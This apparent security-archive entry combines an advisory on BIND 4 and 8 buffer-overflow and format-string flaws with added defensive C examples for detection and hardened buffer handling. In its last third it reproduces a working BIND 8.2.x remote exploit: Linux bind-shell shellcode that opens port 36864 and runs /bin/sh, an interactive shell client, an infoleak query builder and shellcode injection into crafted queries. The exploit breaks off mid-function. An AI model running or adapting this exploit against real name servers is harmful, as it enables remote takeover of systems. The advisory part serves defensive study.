COMMAND
BIND
SYSTEMS AFFECTED
BIND 4 and 8
PROBLEM
The following is based on Covert Security Advisory COVERT-2001-01.
BIND 8 contains a buffer overflow that allows a remote attacker to
execute arbitrary code. The overflow is in the initial processing
of a DNS request and therefore does not require an attacker to
control an authoritative DNS server. In addition, the
vulnerability is not dependent upon configuration options and
affects both recursive and non-recursive servers. This
vulnerability has been designated as CVE candidate CAN-2001-10.
BIND 4 contains a buffer overflow that can allow a remote attacker
to execute arbitrary code. The overflow occurs when BIND reports
an error while attempting to locate IP addresses for name servers.
Exploitation of this vulnerability is restricted by the requirements
that the target name server be recursive and that the attacker have
control of an authoritative DNS server. This vulnerability has
been designated as CVE candidate CAN-2001-11.
BIND 4 contains a format string vulnerability that can allow a
remote attacker to execute arbitrary code. This vulnerability
also occurs when BIND reports an error while attempting to locate
IP addresses for name servers, and thus has the same restrictions
on exploitation as the buffer overflow. This vulnerability was
fixed several versions prior to the current version of BIND 4,
but is still present in certain Unix distributions. This
vulnerability has been designated as CVE candidate CAN-2001-13.
BIND (Berkeley Internet Name Domain) is an implementation of the
DNS (Domain Name System) protocol distributed by the Internet
Software Consortium (www.isc.org). Two versions of BIND
distributed by the ISC, BIND version 4 and BIND version 8, are
vulnerable to the attacks described in this advisory. The most
recent release of BIND, version 9, is not susceptible to these
attacks.
BIND version 8 contains a buffer overflow in the implementation
of Transaction Signatures (TSIG) for DNS security as defined in
RFC 2845. Because the overflow occurs within the initial
processing of a DNS request, both recursive and non-recursive DNS
servers are vulnerable, independent of the DNS security
configuration. The mechanisms employed by the DNS server make it
susceptible to two potential methods of attack.
An attacker can perform a stack based buffer overflow, with two
important qualifications: first, that the number of bytes past the
end of the buffer that the attacker can overwrite is limited in
length, and second, that the values of those bytes are mostly
fixed. On the x86 architecture, the attacker can manipulate a
sufficient number of bytes such that they can modify the saved
frame pointer. Overwriting the least significant byte of the
saved frame pointer can result in the execution of arbitrary code
in certain predictable installations of the name server. The
"infoleak" bug, discovered by Claudio Musmarra, and described in
CERT advisory CA-2001-02, permits an attacker to remotely retrieve
stack frames from named, which allows for direct calculation of
the effect of the one byte overflow.
An attacker can also perform a heap overflow, overwriting malloc's
internal variables. This method is very effective, though it
requires that an operating system's implementation of malloc
stores internal data structures in the allocated memory. For this
attack to be successful, TCP port 53 must be accessible.
BIND version 4 contains a buffer overflow in a section of code
that formulates a warning message for a call to syslog. There
are several conditions that can lead to the triggering of this
overflow, all of which involve the resolution of NS records into
IP addresses. This vulnerability is a standard stack overflow,
but the information an attacker is able to present is limited to
printable characters. This limitation makes susceptibility to
exploitation contingent upon the layout of the named process
within memory, and possibly upon the amount of memory available
to be allocated by the name server.
In older versions of BIND 4, the previously mentioned call to
syslog uses a user-controllable string as the second (format)
argument, which creates an exploitable condition. The same
restriction applies, in that the format string is limited to
printable characters. Despite this restriction, a remote attacker
is still able to create a malicious format string to exploit the
vulnerable syslog function call.
The BIND 8 vulnerability is the result of a DNS request utilizing
a particular code path that invalidates the logic used to
calculate the length of the request buffer.
When a request is received, it is either stored in the heap or on
the stack, depending on the transport mechanism. Upon receipt of
a UDP request, it is read into a 513 byte buffer on the stack
called "u.buf" by the function datagram_read(). When a TCP
request is received, the message is read by stream_getlen() into
a 64k buffer called "sp->s_buf", which is allocated from the heap
for every socket. An interesting feature of BIND is that it uses
the incoming buffer of both transport mechanisms to read the
request from the network and then modifies it to create an
appropriate response. Two key variables are maintained to track
the usage of the buffer: one containing the actual length of the
data in the buffer, called "msglen", and a second variable
"buflen" that tracks the remaining length free in the buffer.
When a DNS message is received, msglen is initialized to the
length of data received from the network. With a UDP message,
this is the amount of data returned by a recvfrom() call, whereas
with a TCP message, it is the value provided as the length by the
client. buflen is set to the size of the buffer used to read the
message (512 for UDP, 64k for TCP).
Under normal circumstances, as BIND processes a request, it
appends the answer, authoritative, and additional records to the
query. It then modifies the DNS header to reflect these changes
and delivers the response. During this processing, msglen will
reflect the length of the response as it is being formed, and
buflen will be used to track the remaining space available in the
buffer. Throughout the processing, BIND assumes that msglen plus
buflen will equal the original length of the buffer.
Upon receipt of a DNS message, it is processed as either a request
or response based upon the query response flag set in the message
header. If a request is received, BIND then determines whether it
is a query, iquery, update or notification. Beginning with BIND
8.2, prior to request processing, the additional section of the
DNS message is examined for a TSIG resource record. The function
ns_find_tsig() is called to perform this functionality as well as
to enforce a basic level of validity on the TSIG resource record.
If a valid TSIG is identified but an appropriate security key can
not be found, an error is signaled and BIND bypasses the normal
request processing. As a result, msglen and buflen remain close
to their initial values, instead of being set to their "working"
values.
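The lookup described above (ns_find_tsig() scanning the additional section for a TSIG record) is what a network monitor would also need to do to notice TSIG-bearing queries arriving from sources that never legitimately sign requests. The following is an added example, not code from the advisory or from BIND: a small C parser that walks the question and resource-record sections of a DNS message and counts TSIG (type 250, RFC 2845) records in the additional section, returning -1 for truncated or malformed messages. The sample messages are constructed for this example; T_TSIG and the function names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>

#define T_TSIG 250   /* RFC 2845 TSIG resource record type (0xfa) */

/* Skip a DNS name starting at off; handles plain labels and compression
 * pointers (0xc0 prefix).  Returns the offset just past the name, or 0 if
 * the name runs off the end of the message or uses a reserved label type. */
static size_t skip_name(const uint8_t *m, size_t len, size_t off)
{
    while (off < len) {
        uint8_t l = m[off];
        if (l == 0)
            return off + 1;                       /* root label terminates */
        if ((l & 0xc0) == 0xc0)
            return (off + 2 <= len) ? off + 2 : 0; /* 2-byte compression pointer */
        if (l & 0xc0)
            return 0;                             /* 0x40/0x80 are reserved */
        off += 1 + l;
    }
    return 0;
}

/* Count TSIG records in the additional section of a DNS message.
 * Answer and authority records are skipped generically.  Returns -1 when
 * the message is shorter than any section count or RDLENGTH claims. */
int count_tsig_additional(const uint8_t *m, size_t len)
{
    if (len < 12)
        return -1;
    unsigned qd = (m[4] << 8) | m[5], an = (m[6] << 8) | m[7];
    unsigned ns = (m[8] << 8) | m[9], ar = (m[10] << 8) | m[11];
    size_t off = 12;

    for (unsigned i = 0; i < qd; i++) {
        off = skip_name(m, len, off);
        if (!off || off + 4 > len)
            return -1;
        off += 4;                                 /* QTYPE, QCLASS */
    }

    int tsig = 0;
    unsigned total = an + ns + ar;
    for (unsigned i = 0; i < total; i++) {
        off = skip_name(m, len, off);
        if (!off || off + 10 > len)
            return -1;                            /* TYPE CLASS TTL RDLENGTH */
        unsigned type  = (m[off] << 8) | m[off + 1];
        unsigned rdlen = (m[off + 8] << 8) | m[off + 9];
        off += 10;
        if (rdlen > len - off)
            return -1;                            /* RDLENGTH exceeds message */
        if (i >= an + ns && type == T_TSIG)
            tsig++;                               /* only count the AR section */
        off += rdlen;
    }
    return tsig;
}

/* Constructed sample: standard query for example.com/A with one
 * additional record of type TSIG (empty name, class ANY, no RDATA). */
static const uint8_t QUERY_WITH_TSIG[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0, 0x00, 0x01, 0x00, 0x01,
    0x00, 0x00, 0xfa, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

/* Constructed sample: the same query with ARCOUNT = 0 and no extra record. */
static const uint8_t QUERY_PLAIN[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0, 0x00, 0x01, 0x00, 0x01
};

int sample_tsig_count(void)      { return count_tsig_additional(QUERY_WITH_TSIG, sizeof QUERY_WITH_TSIG); }
int sample_plain_count(void)     { return count_tsig_additional(QUERY_PLAIN, sizeof QUERY_PLAIN); }
/* Feeding only 35 of the 40 bytes cuts the TSIG record's fixed fields short. */
int sample_truncated_count(void) { return count_tsig_additional(QUERY_WITH_TSIG, 35); }
```

A monitor built on this would alert on a non-zero count from any client that is not a known dynamic-update or zone-transfer peer; the parser deliberately never writes into the message it inspects, so a malformed record can only make it return -1.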
BIND processes the request as an error since a TSIG was identified
but an appropriate security key was not found. As part of the
error generation, BIND reuses the request buffer and appends a
TSIG after the question section. At this point, BIND assumes that
the size of the request is msglen plus buflen which, under normal
circumstances, would be correct. However, in this special case,
the request was never processed and "msglen + buflen" is in fact
almost twice the size of the original buffer. BIND is then
willing to append a TSIG via ns_sign() beyond the limits of the
buffer.
Since a valid security key was not found, ns_sign() will only
append a small number of bytes with limited values. As mentioned
above, this makes the vulnerable BIND installation susceptible to
two types of attack.
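The root cause above is an accounting invariant (msglen + buflen equals the real buffer size) that holds only if the normal processing path ran. The following added example, written for this page and not taken from BIND, models that accounting in C: append_overflows_by_accounting() shows how a length check based on msglen + buflen passes for a request that skipped processing even though the write exceeds the real buffer, and append_tsig_checked() shows the hardened form, which derives free space from the true capacity and re-establishes the invariant after every append. The struct, the field values (513-byte UDP buffer, 60-byte TSIG) and all function names are this example's assumptions.

```c
#include <string.h>
#include <stddef.h>

/* Constructed model of the request buffer the advisory describes.  cap is
 * the real size of the backing storage (513 for u.buf, 64k for s_buf);
 * msglen and buflen are the two counters BIND 8 maintains. */
struct dns_buf {
    unsigned char *data;
    size_t cap;      /* true allocation size */
    size_t msglen;   /* bytes of message currently in the buffer */
    size_t buflen;   /* bytes the caller believes remain free */
};

/* The faulty assumption: available room is judged against msglen + buflen,
 * which equals cap only when buflen was decremented as msglen grew.
 * Returns 1 if an append of tsig_len bytes passes that check yet lands
 * beyond the real end of the buffer. */
int append_overflows_by_accounting(const struct dns_buf *b, size_t tsig_len)
{
    size_t assumed_size = b->msglen + b->buflen;   /* what the code trusts */
    return (b->msglen + tsig_len <= assumed_size)  /* check passes ...      */
        && (b->msglen + tsig_len > b->cap);        /* ... but exceeds reality */
}

/* Hardened append: free space comes from the real capacity, never from a
 * counter a skipped code path may have left stale.  Returns bytes appended
 * or -1 if the record does not fit. */
long append_tsig_checked(struct dns_buf *b, const unsigned char *tsig, size_t tsig_len)
{
    if (b->msglen > b->cap || tsig_len > b->cap - b->msglen)
        return -1;
    memcpy(b->data + b->msglen, tsig, tsig_len);
    b->msglen += tsig_len;
    b->buflen = b->cap - b->msglen;               /* re-establish the invariant */
    return (long)tsig_len;
}

/* The two states the advisory contrasts on a 513-byte UDP buffer:
 * "normal"  - request processed, so msglen + buflen == 513;
 * "skipped" - TSIG error path, both counters near their initial values
 *             (msglen = bytes received, buflen = 512), summing to ~1012.
 * Returns 1 when only the skipped state would overflow under the old check. */
int tsig_error_path_overflows(void)
{
    unsigned char storage[513];
    struct dns_buf normal  = { storage, sizeof storage, 400, 113 };
    struct dns_buf skipped = { storage, sizeof storage, 500, 512 };
    return append_overflows_by_accounting(&skipped, 60)
        && !append_overflows_by_accounting(&normal, 60);
}

/* Runs both states through the hardened append.  Returns 1 when the normal
 * request accepts a 60-byte TSIG and the error-path request rejects it. */
int checked_append_behaves(void)
{
    unsigned char s1[513], s2[513];
    unsigned char tsig[60] = { 0 };                /* constructed placeholder record */
    struct dns_buf normal  = { s1, sizeof s1, 400, 113 };
    struct dns_buf skipped = { s2, sizeof s2, 500, 512 };
    long a = append_tsig_checked(&normal, tsig, sizeof tsig);
    long b = append_tsig_checked(&skipped, tsig, sizeof tsig);
    return a == 60 && normal.msglen == 460 && normal.buflen == 53 && b == -1;
}
```

The general lesson is that a derived counter such as buflen is only as trustworthy as the code paths that maintain it; a bounds check that can consult the allocation's real size, as append_tsig_checked() does, stays correct even when an early-exit path leaves the bookkeeping half-initialised.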
Combining this oversight with the way a compiler positions the
stack variables in datagram_read(), it is possible for an attacker
to overwrite portions of the saved stack activation records in
datagram_read() with certain fixed values. In this case,
executing arbitrary code is possible under the x86 architecture by
overwriting the saved frame pointer's least significant byte with
zero, which in the majority of cases leaves the saved frame pointer
pointing into the original DNS request.
Predicting the effect of this one byte overflow can be difficult
as it varies depending upon how BIND was started. However, the
"infoleak" bug allows an attacker to retrieve the stack activation
record of datagram_read(). This information can then be used to
calculate the exact number of bytes that will displace the frame
pointer when the least significant byte of the saved ebp is
overwritten with 0.
The second method of attack utilizes certain implementations of
dynamic memory allocation. It is possible to overwrite malloc's
boundary tags with predictable values, changing the standard
libraries' notion of the length of the buffer following the
buffer processed in the DNS request. Thus, the next set of
boundary information is read from within a buffer that an
attacker can control, allowing for a malicious pointer overwrite
upon compaction.
This technique is applicable to malloc implementations that store
linkage information in the actual allocated memory. The following
implementations are known by COVERT to be exploitable: IRIX libc,
Linux glibc, and Solaris libc.
The BIND 4 vulnerability is a sprintf into a 999 byte stack buffer
that occurs when BIND formulates a message warning the
administrator of an inconsistency or error resolving a Name Server
record to an IP address. The vulnerability occurs within
nslookupComplain(), which is a static utility function used by
nslookup().
When BIND encounters a query that it can not answer from its cache
or zone files, it attempts to forward the query to a name server
that is capable of resolving it or of referring BIND to a more
appropriate server. When BIND forwards a query, it creates a
qinfo structure to keep track of the request. It also creates
this structure to track requests it initiates itself in order to
find various linkage information. BIND determines the potential
name servers to which it can forward by walking through each
label of the query in its database, looking for stored NS
records.
The purpose of the nslookup() function is to take a list of NS
records and populate a qinfo structure with their corresponding IP
addresses. BIND can then use those IP addresses as a list of
name servers to which to attempt forwarding or sending a query.
nslookup() performs certain sanity checks on the information that
it retrieves. For example, if it finds that a particular name
server has an IP address of 0.0.0.0, 255.255.255.255, or a
multicast address, then it will flag this condition as an error,
warn the administrator via syslog, and move on to the next NS
record. The function nslookupComplain() is called to warn the
administrator and, as mentioned above, contains a stack overflow.
In order to trigger this overflow, an attacker needs to get BIND
to cache an NS record with a very large length. Furthermore, the
attacker needs to cache a record for the resolution of the NS
record that contains one of the problem conditions for the
logging. This is achievable by sending a query to a recursive
name server, asking it to resolve a large name that is under the
authority of a malicious name server. The malicious name server
then needs to refer the request to another name server also with
a large name, and provide an additional record giving an invalid
address for that name server.
The limitations placed upon the character set allowed in domain
names make the construction of a viable return address difficult.
However, there is a potential for an attacker to make the name
server return into memory that the attacker has forced the name
server to allocate. In this case, vulnerability is contingent
upon the location of the heap and the amount of memory available,
as well as whether or not the operating system has a policy of
lazy swap page allocation as opposed to an eager reservation
policy. COVERT has verified that it is possible to exploit named
running under Linux by growing the heap to sizes that far exceed
the amount of memory and swap available. This was performed by
utilizing specific patterns of memory allocation that maximize
untouched memory.
The situation may be further complicated by the overwriting of two
other stack based buffers, nsbuf and abuf, which are read from
within the same sprintf that overflows the stack based buffer.
This does not come into play, however, if the value chosen to
overwrite the saved return address does not utilize the
terminating null byte of the string. It is worth noting that
this behavior could make it easier for an attacker to exploit the
problem under operating systems that implement sprintf such that
overlapping copies are handled correctly.
The format string vulnerability in BIND 4 occurs in the syslog
call in nslookupComplain(). This vulnerability is in the same
section of code as the previously described buffer overflow, and
thus can be triggered in a similar fashion by using an
authoritative name server under malicious control. This
vulnerability was corrected in bind-4.9.5-P1, although certain
vendors' named implementations based upon this code remain
vulnerable.
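Both BIND 4 problems sit in the same place: a warning assembled with sprintf into a fixed 999-byte stack buffer, and (in the older code) that buffer handed to syslog as the format argument. The following is an added example, not code from BIND or from the advisory, showing the hardened shape of that complaint path in C: snprintf bounds the write and reports truncation, and the logger always receives a fixed "%s" format so directives inside an attacker-supplied name are printed literally. It also includes the NS address sanity check the advisory attributes to nslookup(). The logging stand-in (log_sink), the message wording and all function names are this example's assumptions.

```c
#include <stdio.h>
#include <stdarg.h>
#include <string.h>
#include <stdint.h>

#define COMPLAIN_BUF 999   /* size the advisory gives for the stack buffer */

/* Hypothetical stand-in for syslog(): records the format string it was
 * handed and the rendered message so callers can inspect both. */
static char last_fmt[16];
static char last_msg[COMPLAIN_BUF];

static void log_sink(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    strncpy(last_fmt, fmt, sizeof last_fmt - 1);
    last_fmt[sizeof last_fmt - 1] = '\0';
    vsnprintf(last_msg, sizeof last_msg, fmt, ap);
    va_end(ap);
}

/* The vulnerable pattern the advisory describes was, in outline:
 *     sprintf(buf, "... %s ...", nsname, ...);   -- unbounded write
 *     syslog(LOG_INFO, buf);                      -- buf used as the format
 * Hardened version: snprintf cannot write past buf, and the logger gets a
 * literal "%s" format.  Returns 1 if the warning had to be truncated. */
int complain_checked(const char *reason, const char *nsname, const char *addr)
{
    char buf[COMPLAIN_BUF];
    int n = snprintf(buf, sizeof buf, "%s: NS '%s' has bogus address %s",
                     reason, nsname, addr);
    log_sink("%s", buf);
    return n >= (int)sizeof buf;
}

/* The sanity check nslookup() performs on resolved NS addresses:
 * 0.0.0.0, 255.255.255.255 and multicast (224.0.0.0/4) are rejected.
 * Takes the address in host byte order. */
int ns_address_is_bogus(uint32_t a)
{
    return a == 0x00000000u
        || a == 0xffffffffu
        || (a & 0xf0000000u) == 0xe0000000u;
}

/* Inspection helpers for the recorded log call. */
int last_message_contains(const char *s) { return strstr(last_msg, s) != NULL; }
int last_format_was_fixed(void)          { return strcmp(last_fmt, "%s") == 0; }

/* Constructed oversized NS name (1499 characters): the warning no longer
 * fits, so complain_checked() must report truncation and the rendered
 * message must stop at COMPLAIN_BUF - 1 characters. */
int long_name_truncated(void)
{
    char name[1500];
    memset(name, 'a', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    int truncated = complain_checked("invalid address", name, "0.0.0.0");
    return truncated == 1 && strlen(last_msg) == COMPLAIN_BUF - 1;
}
```

Note that the character-set restriction the advisory mentions (domain names are printable) does not protect the format-string path: "%x" and "%n" are printable, which is why the fix has to be a fixed format, not input filtering.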
Discovery and documentation of these vulnerabilities was conducted
by Anthony Osborne and John McDonald of the COVERT Labs at PGP
Security.
Note that there is a trojaned exploit going around. It attacks
dns1.nai.com. Beware of running code such as this: it will do its
best to attack NAI's name server. It is a typical, though well
disguised, shellcode trick. Look in the Linux shellcode:
\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
It overflows its own buffer in the set_ptr function and changes
the return address to point into the shellcode.
/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg <ian@cypherpunks.ca>
* Jonathan Wilkins <jwilkins@bitland.net>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [adresadeforward@yahoo.com] (the master of jmpz),
* lucysoft [lucysoft@hotmail.com] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez - canaris
* greetz - blizzard, netman.
* creditz - anathema <anathema@hack.co.za> for the original shellcode
* - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#define max(a,b) ((a)>(b)?(a):(b))
#define BUFFSIZE 4096
int argevdisp1, argevdisp2;
char shellcode[] =
/* The numbers at the right indicate the number of bytes the call takes
* and the number of bytes used so far. This needs to be lower than
* 62 in order to fit in a single Query Record. 2 are used in total to
* send the shell code
*/
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
spot first */
"\xeb\x44" /* jmp intr */ // 2 - 2
/* start: */
"\x5e" /* popl %esi */ // 1 - 3
/* socket() */
"\x29\xc0" /* subl %eax, %eax */ // 2 - 5
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */ // 3 - 8
"\x40" /* incl %eax */ // 1 - 9
"\x89\xc3" /* movl %eax, %ebx */ // 2 - 11
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ // 3 - 14
"\x40" /* incl %eax */ // 1 - 15
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */ // 3 - 18
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 21
"\xb0\x66" /* movb $0x66, %al */ // 2 - 23
"\xcd\x80" /* int $0x80 */ // 2 - 25
/* bind() */
"\x43" /* incl %ebx */ // 1 - 26
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ // 4 - 30
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ // 4 - 34
"\x88\x46\x08" /* movb %al, 0x08(%esi) */ // 3 - 37
"\x29\xc0" /* subl %eax, %eax */ // 2 - 39
"\x89\xc2" /* movl %eax, %edx */ // 2 - 41
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"\xb0\x90" /* movb $0x90, %al */ // 2 - 46
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ // 4 - 50
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ // 3 - 53
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ // 3 - 56
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 59
"\xeb\x02" /* jmp cont */ // 2 - 2
/* intr: */
"\xeb\x43" /* jmp callz */ // 2 - 4
/* cont: */
"\xb0\x66" /* movb $0x66, %al */ // 2 - 6
"\xcd\x80" /* int $0x80 */ // 2 - 10
/* listen() */
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ // 3 - 11
"\x43" /* incl %ebx */ // 1 - 12
"\x43" /* incl %ebx */ // 1 - 13
"\xb0\x66" /* movb $0x66, %al */ // 2 - 15
"\xcd\x80" /* int $0x80 */ // 2 - 17
/* accept() */
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ // 3 - 20
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */ // 3 - 23
"\xb0\x66" /* movb $0x66, %al */ // 2 - 25
"\x43" /* incl %ebx */ // 1 - 26
"\xcd\x80" /* int $0x80 */ // 1 - 27
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3" /* xchgb %al, %bl */ // 2 - 29
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 31
"\x29\xc9" /* subl %ecx, %ecx */ // 2 - 33
"\xcd\x80" /* int $0x80 */ // 2 - 35
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 37
"\x41" /* incl %ecx */ // 1 - 38
"\xcd\x80" /* int $0x80 */ // 2 - 40
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 42
"\x41" /* incl %ecx */ // 1 - 43
"\xcd\x80" /* int $0x80 */ // 2 - 45
/* execve() */
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */ // 3 - 48
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ // 3 - 51
"\x87\xf3" /* xchgl %esi, %ebx */ // 2 - 53
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ // 3 - 56
"\xb0\x0b" /* movb $0x0b, %al */ // 2 - 58
"\xcd\x80" /* int $0x80 */ // 2 - 60
"\x90"
/* callz: */
"\xe8\x72\xff\xff\xff" /* call start */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */ // 8 - 13
unsigned long resolve_host(char* host)
{
long res;
struct hostent* he;
if (0 > (res = inet_addr(host)))
{
if (!(he = gethostbyname(host)))
return(0);
res = *(unsigned long*)he->h_addr;
}
return(res);
}
int dumpbuf(char *buff, int len)
{
char line[17];
int x;
/* print out a pretty hex dump */
for(x=0;x<len;x++){
if(!(x%16) && x){
line[16] = 0;
printf("\t%s\n", line);
}
printf("%02X ", (unsigned char)buff[x]);
if(isprint((unsigned char)buff[x]))
line[x%16]=buff[x];
else
line[x%16]='.';
}
printf("\n");
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "uname -a; id;\n", 15, 0);
for(;;)
{
FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);
if(select(fmax, &fds, NULL, NULL, NULL) < 0)
{
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{
bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
{
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
if(send(sockd, buff, ret, 0) != ret)
{
fprintf(stderr, "Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
}
connection(struct sockaddr_in host)
{
int sockd;
host.sin_port = htons(36864);
printf("[*] connecting..\n");
usleep(2000);
if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
exit(EXIT_FAILURE);
}
if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1)
{
printf("[*] wait for your shell..\n");
usleep(500);
runshell(sockd);
}
else
{
printf("[x] error: named not vulnerable or wrong offsets used\n");
}
close(sockd);
}
int infoleak_qry(char* buff)
{
HEADER* hdr;
int n, k;
char* ptr;
int qry_space = 12;
int dummy_names = 7;
int evil_size = 0xff;
memset(buff, 0, BUFFSIZE);
hdr = (HEADER*)buff;
hdr->id = htons(0xbeef);
hdr->opcode = IQUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(0);
hdr->nscount = htons(0);
hdr->ancount = htons(1);
hdr->arcount = htons(0);
ptr = buff + sizeof(HEADER);
printf("[d] HEADER is %d long\n", sizeof(HEADER));
n = 62;
for(k=0; k < dummy_names; k++)
{
*ptr++ = n;
ptr += n;
}
ptr += 1;
PUTSHORT(1/*ns_t_a*/, ptr); /* type */
PUTSHORT(T_A, ptr); /* class */
PUTLONG(1, ptr); /* ttl */
PUTSHORT(evil_size, ptr); /* our *evil* size */
return(ptr - buff + qry_space);
}
int evil_query(char* buff, int offset)
{
int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offset0;
HEADER* hdr;
char *ptr;
int k, bufflen;
u_int n, m;
u_short s;
int i;
int shelloff, shellstarted, shelldone;
int towrite, ourpack;
int n_dummy_rrs = 7;
printf("[d] evil_query(buff, %08x)\n", offset);
printf("[d] shellcode is %d long\n", sizeof(shellcode));
shelladdr = offset - 0x200;
lameaddr = shelladdr + 0x300;
ourpack = offset - 0x250 + 2;
towrite = (offset & ~0xff) - ourpack - 6;
printf("[d] olb = %d\n", (unsigned char) (offset & 0xff));
rroffsetidx = towrite / 70;
offset0 = towrite - rroffsetidx * 70;
if ((offset0 > 52) || (rroffsetidx > 6))
{
printf("[x] could not write our data in buffer (offset0=%d, rroffsetidx=%d)\n", offset0, rroffsetidx);
return(-1);
}
rrshellidx = 1;
deplshellcode = 2;
hdr = (HEADER*)buff;
memset(buff, 0, BUFFSIZE);
/* complete the header */
hdr->id = htons(0xdead);
hdr->opcode = QUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(n_dummy_rrs);
hdr->ancount = htons(0);
hdr->arcount = htons(1);
ptr = buff + sizeof(HEADER);
shellstarted = 0;
shelldone = 0;
shelloff = 0;
n = 63;
for (k = 0; k < n_dummy_rrs; k++)
{
*ptr++ = (char)n;
for(i = 0; i < n-2; i++)
{
if((k == rrshellidx) && (i == deplshellcode) && !shellstarted)
{
printf("[*] injecting shellcode at %d\n", k);
shellstarted = 1;
}
if ((k == rroffsetidx) && (i == offset0))
{
*ptr++ = lameaddr & 0x000000ff;
*ptr++ = (lameaddr & 0x0000ff00) >> 8;
*ptr++ = (lameaddr & 0x00ff0000) >> 16;
*ptr++ = (lameaddr & 0xff000000) >> 24;
*ptr++ = shelladdr & 0x000000ff;
*ptr++ = (shelladdr & 0x0000ff00) >> 8;
*ptr++ = (shelladdr & 0x00ff0000) >> 16;
*ptr++ = (shelladdr & 0xff000000) >> 24;
*ptr++ = argevdisp1 & 0x000000ff;
*ptr++ = (argevdisp1 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp1 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp1 & 0xff000000) >> 24;
*ptr++ = argevdisp2 & 0x000000ff;
*ptr++ = (argevdisp2 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp2 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp2 & 0xff000000) >> 24;
i += 15;
}
else
{
if (shellstarted && !shelldone)
{
*ptr++ = shellcode[shelloff++];
if(shelloff == (sizeof(shellcode)))
shelldone=1;
}
else
{
*ptr++ = i;
}
}
}
/* OK: this next set of bytes constitutes the end of the
* NAME field, the QTYPE field, and the QCLASS field.
* We have to have the shellcode skip over these bytes,
* as well as the leading 0x3f (63) byte for the next
* NAME field. We do that by putting a jmp instruction
* here.
*/
*ptr++ = 0xeb;
if (k == 0)
{
*ptr++ = 10;
/* For alignment reasons, we need to stick an extra
* NAME segment in here, of length 3 (2 + header).
*/
m = 2;
*ptr++ = (char)m; // header
ptr += 2;
}
else
{
*ptr++ = 0x07;
}
/* End the NAME with a compressed pointer. Note that it's
* not clear that the value used, C0 00, is legal (it
* points to the beginning of the packet), but BIND apparently
* treats such things as name terminators, anyway.
*/
*ptr++ = 0xc0; /*NS_CMPRSFLGS*/
*ptr++ = 0x00; /*NS_CMPRSFLGS*/
ptr += 4; /* QTYPE, QCLASS */
}
/* Now we make the TSIG AR */
